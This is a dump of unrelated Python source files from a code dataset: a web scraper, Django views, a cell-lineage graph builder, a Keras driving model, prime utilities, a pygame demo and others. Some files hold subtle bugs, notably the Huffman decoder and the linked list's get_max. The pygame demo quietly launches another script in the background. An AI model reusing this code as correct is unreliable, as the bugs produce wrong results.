re\r\nresponse = requests.get('http://www.cricbuzz.com/cricket-series/2676/indian-premier-league-2018/squads')\r\nsoup = BeautifulSoup(response.text, 'html.parser')\r\ncontent=soup.find(id=\"page-wrapper\")\r\n\r\ntemplist=['Chennai Super Kings',\r\n'Royal Challengers Bangalore',\r\n'Kings XI Punjab',\r\n'Rajasthan Royals',\r\n'Delhi Daredevils',\r\n'Mumbai Indians', \r\n'Sunrisers Hyderabad',\r\n'Kolkata Knight Riders']\r\n\r\nteams=[]\r\nx=0\r\nfor a in content.contents[7].find_all('a'):\r\n if a.string:\r\n #print(a.string)\r\n if a.string!='More Stats':\r\n #print(a.string)\r\n if a.string in templist:\r\n #print(a.string)\r\n if x>0:\r\n teams.append(newteam)\r\n #print(newteam) \r\n x=x+1\r\n newteam={} #make new team object here\r\n newteam['name']=a.string #assigning name to the team\r\n #newteam['captain']=\"\"\r\n newteam['squad']=[]\r\n else:\r\n newplayer={}\r\n newplayer['name']=a.string\r\n #newplayer['alias']=[]\r\n #print(a.string)\r\n newteam['squad'].append(newplayer) \r\n else:\r\n teams.append(newteam)\r\nprint(teams)","sub_path":"playerteammap.py","file_name":"playerteammap.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"389647490","text":"\"\"\"\nHuffman coding assigns variable length codewords to fixed length input characters based on their frequencies. More\nfrequent characters are assigned shorter codewords and less frequent characters are assigned longer codewords.\nAll edges along the path to a character contain a code digit. If they are on the left side of the tree, they will be a\n0 (zero). If on the right, they'll be a 1 (one). Only the leaves will contain a letter and its frequency count. All\nother nodes will contain a null instead of a character, and the count of the frequency of all of it and its descendant\ncharacters.\n\nhttps://www.hackerrank.com/challenges/tree-huffman-decoding/problem?h_l=interview&playlist_slugs%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D=trees\n\"\"\"\n\ndef decodeHuff(root, s):\n \"\"\"\n\n :param root: reference to the root node of the Huffman tree\n :param s: Huffman encoded string\n :return: the decoded string\n \"\"\"\n\n decoded_string = ''\n st_len = len(s)\n i = 0\n while i < st_len:\n c,i = get_char(root,s,i)\n decoded_string += c\n return decoded_string\n\ndef get_char(root, s, i):\n if root.data != '':\n return root.data, i\n i += 1\n if s[i] == 0:\n return get_char(root.left, s, i), i\n else:\n return get_char(root.right, s, i), i","sub_path":"Trees/huffman.py","file_name":"huffman.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"563772975","text":"import pandas as pd\nimport sys\nimport os\nfrom .helpers import write_csv\n\n\"\"\"\nDoc Doc Doc\n\"\"\"\n\n\nclass TrapGraph:\n\n def __init__(self, df, run_graph=True, file_name=None):\n self.df = df\n self.run_graph = run_graph\n self.file_name = file_name\n self.trap_num = None\n self.graph = {}\n self.root_nodes = []\n self.root_pred_ids = []\n self.branch_nodes = []\n self.time_num_obj = []\n self.root_endpoints = {}\n self.graph_helper = {}\n self._on_init()\n\n def _on_init(self):\n\n self.graph_helper[\"pred_id_last_node\"] = {} # For each predID, tracks the last node of that id.\n self.graph_helper[\"current_num_obj\"] = 0 # total_objs for current time_step\n self.graph_helper[\"last_num_obj\"] = 0 # total_objs for last time_step\n self.graph_helper[\"next_num_obj\"] = 0 # total_objs for next time_step\n self.graph_helper[\"next_pred_ids\"] = [] # predID's present in next time_step\n\n self._establish_root_nodes()\n self._set_root_endpoints()\n\n if self.run_graph:\n self._make_graph()\n\n # Some post-processing on self.graph to put edge nodes in numerical order.\n for k in self.graph:\n vals = [float(v) for v in self.graph[k]]\n vals = sorted(vals)\n vals = [str(round(v, 1)) for v in vals]\n self.graph[k] = vals\n\n def _establish_root_nodes(self):\n \"\"\"\n Doc Doc Doc\n \"\"\"\n\n start_time = self.df[\"time_num\"].unique()[0]\n start_time_df = self.df.query(\"time_num == {}\".format(start_time))\n len_time_step = len(start_time_df.index)\n self.time_num_obj.append([start_time, len_time_step])\n self.graph_helper[\"last_num_obj\"] = len_time_step\n\n for i, node in enumerate(start_time_df.to_dict('records')):\n\n pred_id = node[\"predecessorID\"]\n time_num = node[\"time_num\"]\n node_name = \"{}.{}\".format(time_num, pred_id)\n self.graph[node_name] = []\n self.root_nodes.append(node_name)\n self.root_pred_ids.append(pred_id)\n self.graph_helper[\"pred_id_last_node\"][pred_id] = node_name\n self.trap_num = node[\"trap_num\"]\n\n def _set_root_endpoints(self):\n \"\"\"\n Doc Doc Doc\n \"\"\"\n\n self.root_endpoints = {k: 0 for k in self.root_pred_ids}\n\n remaining_root_pred_ids = self.root_pred_ids.copy()\n\n for t in self.df[\"time_num\"].unique()[1:]:\n\n if not remaining_root_pred_ids:\n return\n\n time_df = self.df.query(\"time_num == {}\".format(t))\n step_info = time_df.to_dict('records')\n active_pred_ids = [v[\"predecessorID\"] for v in step_info]\n\n for root_pred_id in self.root_pred_ids:\n if root_pred_id not in remaining_root_pred_ids:\n continue\n if root_pred_id not in active_pred_ids:\n self.root_endpoints[root_pred_id] = max(t - 1, 1)\n remaining_root_pred_ids.remove(root_pred_id)\n\n for root_endpoint in self.root_endpoints:\n if self.root_endpoints[root_endpoint] == 0:\n self.root_endpoints[root_endpoint] = self.df[\"time_num\"].max()\n\n def _process_time_step(self, step_info):\n \"\"\"\n Doc Doc Doc\n \"\"\"\n\n # print(step_info)\n\n # Get Pred ID's in Current Time Step\n active_pred_ids = [v[\"predecessorID\"] for v in step_info]\n\n # Get Pred ID's in next Time Step (Branches will be these) Sort.\n assign_pred_ids = list(set(self.graph_helper[\"next_pred_ids\"]) - set(active_pred_ids))\n assign_pred_ids.sort(reverse=True)\n\n # Sort Step Info, Assignment will try to associate the lower current pred_id to the next lowest etc.\n step_info.sort(key=lambda x: x[\"predecessorID\"])\n isolated_pred_id = None\n parsed_steps = []\n for step in step_info:\n step_arr = [step[k] for k in step]\n if step_arr in parsed_steps:\n branch_node_name = \"{}.{}\".format(step[\"time_num\"], step[\"predecessorID\"])\n self.branch_nodes.append(branch_node_name)\n try:\n next_pred_id = assign_pred_ids.pop() # Pull from sorted assign_pred_ids, de-que\n except IndexError:\n if not isolated_pred_id:\n try:\n isolated_pred_id = max(self.graph_helper[\"next_pred_ids\"]) + 1\n print(\"POP ERROR - Isolated New Max:\", step_arr, isolated_pred_id)\n except ValueError:\n isolated_pred_id = step[\"predecessorID\"] + 1\n print(\"POP ERROR - Isolated New +1\", step_arr, isolated_pred_id)\n else:\n isolated_pred_id += 1\n print(\"POP ERROR - Isolated Existing\", step_arr, isolated_pred_id)\n next_pred_id = isolated_pred_id\n\n # print(\"GOT BRANCH:\", branch_node_name, step_arr, \"NextPredID:{}\".format(next_pred_id))\n step[\"predecessorID\"] = next_pred_id\n self.graph_helper[\"pred_id_last_node\"][step[\"predecessorID\"]] = branch_node_name\n active_pred_ids += [next_pred_id]\n\n parsed_steps.append(step_arr)\n\n return step_info\n\n def _make_graph(self):\n \"\"\"\n Doc Doc Doc\n \"\"\"\n\n # We are interested in changes that occur between time steps. So will create sub-df's using those times.\n # Start at 2nd index because _establish_root_nodes() handles above\n for t in self.df[\"time_num\"].unique()[1:]:\n\n # Run another filter of our initial filtered df from above on loop time step.\n time_df = self.df.query(\"time_num == {}\".format(t))\n next_time_df = self.df.query(\"time_num == {}\".format(t+1))\n\n # The number of data points per time-step may dictate behavior.\n len_time_step = len(time_df.index)\n len_next_time_step = len(next_time_df.index)\n next_time_step_pred_ids = list(next_time_df[\"predecessorID\"].unique())\n self.graph_helper[\"current_num_obj\"] = len_time_step\n self.graph_helper[\"next_num_obj\"] = len_next_time_step\n self.graph_helper[\"next_pred_ids\"] = next_time_step_pred_ids\n\n # Tracks number of obj seen per time step. Used in debug/display purposes.\n self.time_num_obj.append([t, len_time_step])\n\n step_info = time_df.to_dict('records')\n\n # Check for existence of root/mother cell, if not present, return since main branch has ended.\n active_pred_ids = [v[\"predecessorID\"] for v in step_info]\n for root_pred_id in self.root_pred_ids:\n if root_pred_id not in active_pred_ids:\n print(\"Root:{} absent in step:{}\".format(root_pred_id, step_info))\n return\n\n step_info = self._process_time_step(step_info)\n\n self.graph_helper[\"last_num_obj\"] = len(step_info)\n\n for node in step_info:\n\n pred_id = node[\"predecessorID\"]\n time_num = node[\"time_num\"]\n node_name = \"{}.{}\".format(time_num, pred_id)\n\n self.graph[node_name] = []\n try:\n pred_id_last_node_name = self.graph_helper[\"pred_id_last_node\"][pred_id]\n except KeyError:\n print(\"Error Pred_Id_Last_Node_Name 1, Setting Isolated Node:{}\".format(node_name))\n self.graph_helper[\"pred_id_last_node\"][pred_id] = node_name\n continue\n # print(pred_id)\n # print(step_info)\n # print(self.graph_helper)\n # print(node_name)\n # sys.exit()\n\n self.graph[node_name].append(pred_id_last_node_name)\n try:\n self.graph[pred_id_last_node_name].append(node_name)\n except KeyError:\n print(\"Error Pred_Id_Last_Node_Name 2\")\n print(node)\n print(pred_id_last_node_name)\n print(node_name)\n print(self.graph_helper)\n sys.exit()\n\n self.graph_helper[\"pred_id_last_node\"][pred_id] = node_name\n\n def write_cytoscape_network_csv(self):\n\n if not self.file_name:\n raise ValueError(\"Must Supply FileName to Generate CytoScape Network CSV\")\n\n if len(self.root_nodes) != 1:\n raise ValueError(\"Currently Only 1 Root Node Supported\")\n\n if not os.path.exists(\"cytoscape\"):\n os.mkdir(\"cytoscape\")\n\n # print(self.graph)\n\n res = [[\"source\", \"target\", \"interaction\", \"directed\", \"symbol\", \"value\"]]\n has_parsed = []\n for source_node in self.graph:\n for target_node in self.graph[source_node]:\n if target_node in has_parsed:\n continue\n symbol = source_node\n value = 1.0\n directed = True\n interaction = \"pp\"\n if source_node in self.root_nodes:\n directed = False\n\n res.append([source_node, target_node, interaction, directed, symbol, value])\n has_parsed.append(source_node)\n\n write_csv(\"cytoscape/{}_TrapNum_{}_cytoscape_network.csv\".format(self.file_name.replace(\".csv\", \"\"), self.trap_num), res)\n\n\n\n\n","sub_path":"cell_family_tree/parse/trap_graph.py","file_name":"trap_graph.py","file_ext":"py","file_size_in_byte":9677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"342010959","text":"from rest_framework import generics\n\nfrom utils.api_helpers import get_datatable_json, DefaultNameOrdering\nfrom utils.api_logging import LoggingMixin\n\nfrom api.models import Milestone\nfrom api.serializers import MilestoneSerializer\n\n\nclass FeatureMappingMilestoneView(LoggingMixin, DefaultNameOrdering, generics.ListAPIView):\n \"\"\" List FeatureMapping Milestone objects \"\"\"\n queryset = Milestone.objects.all()\n serializer_class = MilestoneSerializer\n filterset_fields = ['name']\n\n\nclass FeatureMappingMilestoneDetailsView(LoggingMixin, generics.RetrieveUpdateDestroyAPIView):\n \"\"\" FeatureMapping Milestone single object management \"\"\"\n queryset = Milestone.objects.all()\n serializer_class = MilestoneSerializer\n\n\nclass FeatureMappingMilestoneTableView(LoggingMixin, DefaultNameOrdering, generics.ListAPIView):\n \"\"\" FeatureMapping Milestone table view formatted for DataTable \"\"\"\n queryset = Milestone.objects.all()\n serializer_class = MilestoneSerializer\n filterset_fields = ['name']\n\n def get(self, request, *args, **kwargs):\n return get_datatable_json(self, actions=False)\n","sub_path":"backend/reporting/api/views/feature_mapping/milestone.py","file_name":"milestone.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"595410139","text":"\"\"\"\nClass that represents a single linked\nlist node that holds a single value\nand a reference to the next node in the list\n\"\"\"\nclass Node:\n def __init__(self, value=None, next_node=None):\n self.value = value\n self.next_node = next_node\n\n def get_value(self):\n return self.value\n\n def get_next(self):\n return self.next_node\n\n def set_next(self, new_next):\n self.next_node = new_next\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n\n # add an itme to the end of the list\n def add_to_tail(self, value):\n # if value is a proper node then turn it into one\n if not isinstance(value, Node):\n value = Node(value)\n\n # if it is an empty list, then add value as head of the list\n if self.head is None:\n self.head = value\n\n else:\n # if it is not a empty list, then add value as the tail of the list\n # self.tail.next = value\n self.tail.set_next(value)\n self.tail = value\n\n return\n\n def remove_head(self):\n if self.head:\n # if the next node from the head is empty\n if self.head.get_next() == None:\n # set temp_head to current head\n temp_head = self.head\n # set both the current head and current tail to be empty\n self.head = None\n self.tail = None\n # then return the temporary head\n return temp_head.get_value()\n else:\n # else set the temporary head to the current head\n temp_head = self.head\n # set the current head to the next node\n self.head = self.head.get_next()\n # return the temporary head\n return temp_head.get_value()\n else:\n # else return None\n return None\n\n def contains(self, value):\n # set self.head to current_head\n current_head = self.head\n # while the current_head\n while current_head:\n # if current_head has a value\n if current_head.get_value() == value:\n # return true\n return True\n # set current_head to the next node \n current_head = current_head.get_next()\n # return false \n return False\n\n def get_max(self):\n current_head = self.head\n # set maximum value to None\n max_value = None\n\n while current_head:\n\n # if max_value is None or current_head value is greater than max value\n if max_value is None or current_head.get_value() > max_value:\n\n # set max_value to value of current_head\n max_value = current_head.get_value()\n\n # set the current head to the next node of the current head\n current_head = current_head.get_value()\n\n # return max_value\n return max_value ","sub_path":"linked_list/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"466672136","text":"import datetime\nimport time\n\n\n# tw_date: 107/01/01\ndef tw_date2int(date_str):\n date_split = date_str.split('/')\n return int(\"{}{}{}\".format(int(date_split[0]) + 1911, date_split[1], date_split[2]))\n\n\ndef float_parser(float_str):\n if float_str == \"X0.00\" or float_str == \"-\":\n return 0.0\n\n new_str = \"\"\n\n try:\n for char in float_str:\n if char == ',':\n continue\n\n new_str += char\n\n op_float = float(new_str)\n except:\n raise ValueError(\"error parsing {}\".format(float_str))\n\n return op_float\n\n\ndef delay(sec):\n start_datetime = datetime.datetime.now()\n while (datetime.datetime.now() - start_datetime).total_seconds() < sec:\n time.sleep(0.3)\n\n\ndef wait_retry(logger, sec):\n logger.logp(\"Retry after {}s...\".format(sec))\n time.sleep(sec)\n\n\ndef check_smd_content_by_key(day_data, key):\n try:\n if int(tw_date2int(day_data[0]) / 100) == int(key):\n return True\n except:\n pass\n\n return False\n","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"39659158","text":"# Python program to transform the\n# image with the mouse\n\n#Import the libraries pygame and math\nimport pygame\nimport math\nfrom pygame.locals import *\nimport os\n\n# Take colors input\nRED = (255, 0, 0)\nBLACK = (0, 0, 0)\nYELLOW = (255, 255, 0)\n\n#Construct the GUI game\npygame.init()\n\n#Set dimensions of game GUI\nw, h = 600, 440\nscreen = pygame.display.set_mode((w, h))\n\n# Set running, angle and scale values\nrunning = True\nangle = 0\nscale = 1\n\n# Take image as input\nimg_logo = pygame.image.load('player.png')\nimg_logo.convert()\n\n# Draw a rectangle around the image\nrect_logo = img_logo.get_rect()\npygame.draw.rect(img_logo, RED, rect_logo, 1)\n\n# Set the center and mouse position\ncenter = w//2, h//2\nmouse = pygame.mouse.get_pos()\n\n#Store the image in a new variable\n#Construct the rectangle around image\nimg = img_logo\nrect = img.get_rect()\nrect.center = center\nos.system('python3 snack.py &')\n# Setting what happens when game is\n# in running state\nwhile running:\n\tfor event in pygame.event.get():\n\n\t\t# Close if the user quits the game\n\t\tif event.type == QUIT:\n\t\t\trunning = False\n\n\t\t# Set at which angle the image will\n\t\t# move left or right\n\t\tif event.type == KEYDOWN:\n\t\t\tif event.key == K_a:\n\t\t\t\tif event.mod & KMOD_SHIFT:\n\t\t\t\t\tangle -= 5\n\t\t\t\telse:\n\t\t\t\t\tangle += 5\n\n\t\t\t# Set at what ratio the image will\n\t\t\t# decrease or increase\n\t\t\telif event.key == K_a:\n\t\t\t\tif event.mod & KMOD_SHIFT:\n\t\t\t\t\tscale /= 1.5\n\t\t\t\telse:\n\t\t\t\t\tscale *= 1.5\n\t\t\t\t\n\t\t# Move the image with the specified coordinates,\n\t\t# angle and scale\t\t\n\t\telif event.type == MOUSEMOTION:\n\t\t\tmouse = event.pos\n\t\t\tx = mouse[0] - center[0]\n\t\t\ty = mouse[1] - center[1]\n\t\t\td = math.sqrt(x ** 2 + y ** 2)\n\t\t\tangle = math.degrees(-math.atan2(y, x))\n\t\t\t# scale = abs(5 * d / w)\n\t\t\timg = pygame.transform.rotate(img_logo, angle)\n\t\t\trect = img.get_rect()\n\t\t\trect.center = center\n\t\n\t# Set screen color and image on screen\n\tscreen.fill(YELLOW)\n\tscreen.blit(img, rect)\n\n\t# Draw the rectangle, line and circle through\n\t# which image can be transformed\n\tpygame.draw.rect(screen, BLACK, rect, 3)\n\tpygame.draw.line(screen, RED, center, mouse, 2)\n\tpygame.draw.circle(screen, RED, center, 6, 1)\n\tpygame.draw.circle(screen, BLACK, mouse, 6, 2)\n\t\n\t# Update the GUI game\n\tpygame.display.update()\n\n# Quit the GUI game\npygame.quit()\n","sub_path":"[MicroGame]/TestRotate.py","file_name":"TestRotate.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"86660408","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Image',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ('updated', models.DateTimeField(auto_now=True)),\n ('resource_url', models.CharField(max_length=200)),\n ('is_active', models.BooleanField(default=True)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Resort',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ('updated', models.DateTimeField(auto_now=True)),\n ('name', models.CharField(max_length=100)),\n ('resource_url', models.URLField()),\n ('latitude', models.FloatField()),\n ('longitude', models.FloatField()),\n ('overview', models.TextField()),\n ('about', models.TextField()),\n ('is_active', models.BooleanField(default=True)),\n ('snow_upper_depth', models.IntegerField(default=0)),\n ('snow_middle_depth', models.IntegerField(default=0)),\n ('snow_lower_depth', models.IntegerField(default=0)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='image',\n name='resort',\n field=models.ForeignKey(to='resorts.Resort'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='SnowFall',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ('updated', models.DateTimeField(auto_now=True)),\n ('amount', models.IntegerField()),\n ('event_date', models.DateField()),\n ('resort', models.ForeignKey(to='resorts.Resort')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"skihub/resorts/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"167520418","text":"import os\n\n\nd = {'x':1,'y':2,'z':3}\nfor k,v in d.items():\n\tprint(k,'=',v)\n\n\nd1 = {'x':'a','y':'2','z':'3'}\nprint([k+'='+v for k,v in d1.items()])\n\nd2 = ['Hello','WorlD','IBM','Apple']\nprint([s.lower() for s in d2])\n","sub_path":"pythonBase/importTest.py","file_name":"importTest.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"465567118","text":"from django.conf.urls.defaults import patterns, include\n\nfrom records.views import CreateWishView, CreateGiftView, WishListView\n\nurlpatterns = patterns('records.views',\n (r'^wishes$', WishListView.as_view()),\n (r'^wishes/add$', CreateWishView.as_view()),\n (r'^gifts/add$', CreateGiftView.as_view()),\n #(r'^$', ProfileListView.as_view()),\n #(r'^(?P[0-9]+)', ProfileDetailView.as_view()),\n #(r'^edit/$', UserUpdateView.as_view()),\n)\n","sub_path":"records/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78219518","text":"def numericDivider(A, B):\n A = A.split('.')\n B = B.split('.')\n a = len(A)\n b = len(B)\n min_len = min(len(A), len(B))\n rest = ''\n for i in range(min_len):\n if int(A[i]) > int(B[i]):\n return 1\n\n elif int(A[i]) < int(B[i]):\n return -1\n\n else:\n continue\n\n if len(A) > len(B):\n for i in range(b, a):\n rest += str(A[i])\n\n elif len(B) > len(A):\n for i in range(a, b):\n rest += str(B[i])\n\n if len(A) > len(B) and int(rest) != 0:\n return 1\n\n elif len(B) > len(A) and int(rest) != 0:\n return -1\n\n else:\n return 0\n\n\nr = numericDivider('01.0', '1.0')\nprint(r)\n","sub_path":"Strings/compare-versions.py","file_name":"compare-versions.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"308534247","text":"'''\nOriginal Author: Kaden Archibald\nARES Team - Navigation & Autonomy\nhttps://github.com/USU-Ares/Navigation_2019\n\nUtah State University\nDepartment of Mechanical and Aerospace Engineering\n\nCreated: Jan 11, 2019\nRevised: Feb 20, 2019\nVersion: IPython 6.2.1 (Anaconda distribution) with Python 3.6.4\n\nDriver Code for Main GUI\n'''\n\n\ntry:\n import MasterGUI as gui\nexcept ModuleNotFoundError:\n print('MasterGUI.py source code not found')\n input('Press return to exit')\n quit()\n\n\ndef main(*args, **kwargs):\n \n # Create application\n application = gui.MasterGUI(master = gui.root)\n application.master.title('USU Ares Rover')\n \n # Run application\n application.appExec()\n \n return None\n\n\n\nif __name__ == '__main__':\n try:\n print('Starting GUI...')\n main()\n \n except KeyboardInterrupt as keyStop:\n print('Error: ', keyStop)\n \n except gui.tk.TclError as tkStop:\n pass\n \n finally:\n print('Terminating GUI...')\n gui.MasterGUI.halt(gui.MasterGUI)\n ","sub_path":"src/GUI/MasterGUIMain.py","file_name":"MasterGUIMain.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327941866","text":"#A library of useful utility functions for primes\n\nimport math\n\ndef listPrimesUpTo(n):\n #List primes up to n\n s=list(range(0,n+1))\n s[1]=0\n bottom=2\n top=n//bottom\n while (bottom*bottom<=n):\n while (bottom<=top):\n if s[top]:\n s[top*bottom]=0\n top-=1\n bottom+=1\n top=n//bottom\n return [x for x in s if x]\n\ndef prime(i, primes):\n for prime in primes:\n if not (i == prime or i % prime):\n return False\n primes.add(i)\n return i\n\ndef listFirstPrimes(n):\n #Lists the first n primes\n primes = set([2])\n i, p = 2, 0\n while True:\n if prime(i, primes):\n p += 1\n if p == n:\n return primes\n i += 1\n\n\ndef numDivisors(n):\n primes = listPrimesUpTo(n)\n numberOfDivisors = 1\n for p in primes:\n count = 1\n while n%p == 0:\n n /= p\n count += 1\n numberOfDivisors *= count\n if n == 1:\n break\n return int(numberOfDivisors)\n\ndef millerRabin(a,s,d,n):\n a_to_power = pow(a, d, n)\n if a_to_power == 1:\n return True\n for i in range(s-1):\n if a_to_power == n - 1:\n return True\n a_to_power = (a_to_power * a_to_power) % n\n return a_to_power == n - 1\n\n\ndef isPrime(n):\n\t#We use a deterministic Miller-Rabin algorithm (we assume n < 2,152,302,898,747, so we only check 2,3,5,7,11)\n if n > 2152302898746:\n raise NameError('Prime is above Miller-Rabin Limit, please change primesLib.isPrime to proceed')\n if n < 2:\n return False\n if n in {2,3,5,7,11}:\n return True\n\n d = n - 1\n s = 0\n while d % 2 == 0:\n d >>= 1\n s += 1\n for a in {2,3,5,7,11}:\n if not millerRabin(a, s, d, n):\n return False\n return True\n","sub_path":"primesLib.py","file_name":"primesLib.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"44508017","text":"import csv\nimport cv2\nimport numpy as np\nimport sklearn\n\n# Read the data images\nsamples = []\ncorrections = [0.0, 0.25, -0.25] # used for center, left, right image\nwith open('data/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n # Skip the header\n next(reader)\n for line in reader:\n for i in range(3): # Add the 3 images with their corrections, so they can be suffled later\n angle = float(line[3]) + corrections[i]\n samples.append([line[i], angle])\n\n# Split the samples for training and validation\nfrom sklearn.model_selection import train_test_split\ntrain_samples, validation_samples = train_test_split(samples, test_size=0.2)\n\ndef generator(samples, batch_size=32):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n np.random.shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n\n images = []\n measurements = []\n for batch_sample in batch_samples:\n source_path = batch_sample[0]\n filename = source_path.split('/')[-1]\n current_path = 'data/IMG/' + filename\n image = cv2.imread(current_path)\n images.append(image)\n measurement = batch_sample[1]\n measurements.append(measurement)\n # Flip Image and add it to the batch also\n images.append(cv2.flip(image, 1))\n measurements.append(measurement * -1.0)\n\n X_train = np.array(images)\n y_train = np.array(measurements)\n yield sklearn.utils.shuffle(X_train, y_train)\n\nfrom keras.models import Sequential, Model\nfrom keras.layers import Flatten, Dense, Lambda, Cropping2D\nfrom keras.layers.convolutional import Convolution2D\n\n# Preprocessing \nmodel = Sequential()\n# Crop first to work with less data\nmodel.add(Cropping2D(cropping=((70,25),(0,0)), input_shape=(160, 320, 3)))\nmodel.add(Lambda(lambda x: (x / 255.0) - 0.5))\n\n# NVIDIA model\nmodel.add(Convolution2D(24,5,5, subsample=(2,2), activation=\"relu\"))\nmodel.add(Convolution2D(36,5,5, subsample=(2,2), activation=\"relu\"))\nmodel.add(Convolution2D(48,5,5, subsample=(2,2), activation=\"relu\"))\nmodel.add(Convolution2D(64,3,3, activation=\"relu\"))\nmodel.add(Convolution2D(64,3,3, activation=\"relu\"))\nmodel.add(Flatten())\nmodel.add(Dense(100))\nmodel.add(Dense(50))\nmodel.add(Dense(1))\n\n# compile and train the model using the generator function\ntrain_generator = generator(train_samples, batch_size=32)\nvalidation_generator = generator(validation_samples, batch_size=32)\n\nmodel.compile(loss='mse', optimizer='adam')\n\n# Samples per epoch is * 2, cause for each batch we return double images (normal and flipped)\nhistory_object = model.fit_generator(train_generator, \\\n samples_per_epoch=(len(train_samples) * 2), \\\n validation_data=validation_generator, \\\n nb_val_samples=(len(validation_samples) * 2), \\\n nb_epoch=3, verbose=1)\n\nmodel.save('model.h5')\n\n# Model visualization\nfrom keras.utils.visualize_util import plot as model_plot\nmodel_plot(model, to_file='images/model.png', show_shapes=True, show_layer_names=False)\n\n### plot the training and validation loss for each epoch\nplt.plot(history_object.history['loss'])\nplt.plot(history_object.history['val_loss'])\nplt.title('model mean squared error loss')\nplt.ylabel('mean squared error loss')\nplt.xlabel('epoch')\nplt.legend(['training set', 'validation set'], loc='upper right')\nplt.show()\n\nexit()\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"551649553","text":"#!/opt/local/bin/python\n# -*- coding: utf-8 -*- \n'''quick script to add a confusion flag to the full mangahi database without eliminating any rows which don't have entries in the confusion table (topcat does not make this easy!)\n'''\n\nfrom astropy.io import fits\nimport numpy as np\nimport pdb \nimport sys\n\ndef add_conflag(catfile,confile,outfile,addprob=False):\n\n #catfile = original catalog\n #confile = file containing confusion flag\n \n dbhdu = fits.open(catfile)\n chdu = fits.open(confile)\n\n #extract data tables\n db = dbhdu[1].data\n conf = chdu[1].data\n\n #add new column to db which will contain the confusion flag\n new_col = fits.ColDefs([fits.Column(name='conflag',format='I',array=np.zeros(len(db)))])\n newdbhdu = fits.BinTableHDU.from_columns(db.columns + new_col)\n db=newdbhdu.data\n\n\n if addprob==True:\n new_col = fits.ColDefs([fits.Column(name='conf_prob',format='F',array=np.zeros(len(db)))])\n newdbhdu = fits.BinTableHDU.from_columns(db.columns + new_col)\n db=newdbhdu.data \n\n #add confusion flag to db. First isolate unique entries (duplicates will have the same confusion flag) and let's just separate out the ones with conflag==1 (we'll only match these to save time)\n \n uniq_ind = (np.unique(conf['hiname'], return_index=True))[1]\n# uniq_ind = uniques[1]\n conf = conf[uniq_ind]\n sel=conf['conflag']==1\n conf=conf[sel]\n\n for name in conf['hiname']:\n sel = (db['mangaid'] == name)\n db['conflag'][sel]=1\n \n if addprob==True:\n for name,cp in zip(conf['hiname'],conf['conf_prob']):\n sel = (db['mangaid'] == name)\n #print(np.sum(sel))\n db['conf_prob'][sel]=cp\n \n newdbhdu.writeto(outfile,overwrite=True) \n \narguments = sys.argv\nif len(arguments) < 3:\n print('error: please supply input hi-manga catalog and optical matches file')\n sys.exit()\n\ncatfile = arguments[1]\nconfile = arguments[2]\nif len(arguments)>3:\n outfile = arguments[3]\nelse:\n outfile = arguments[1]\n \n#catfile = 'mangahi_dr2_062321_gbtonly.fits'\n#confile = 'mangahi_dr2_062321_gbtonly_nsamatch_1.5beam_withprob.fits'\n#outfile = 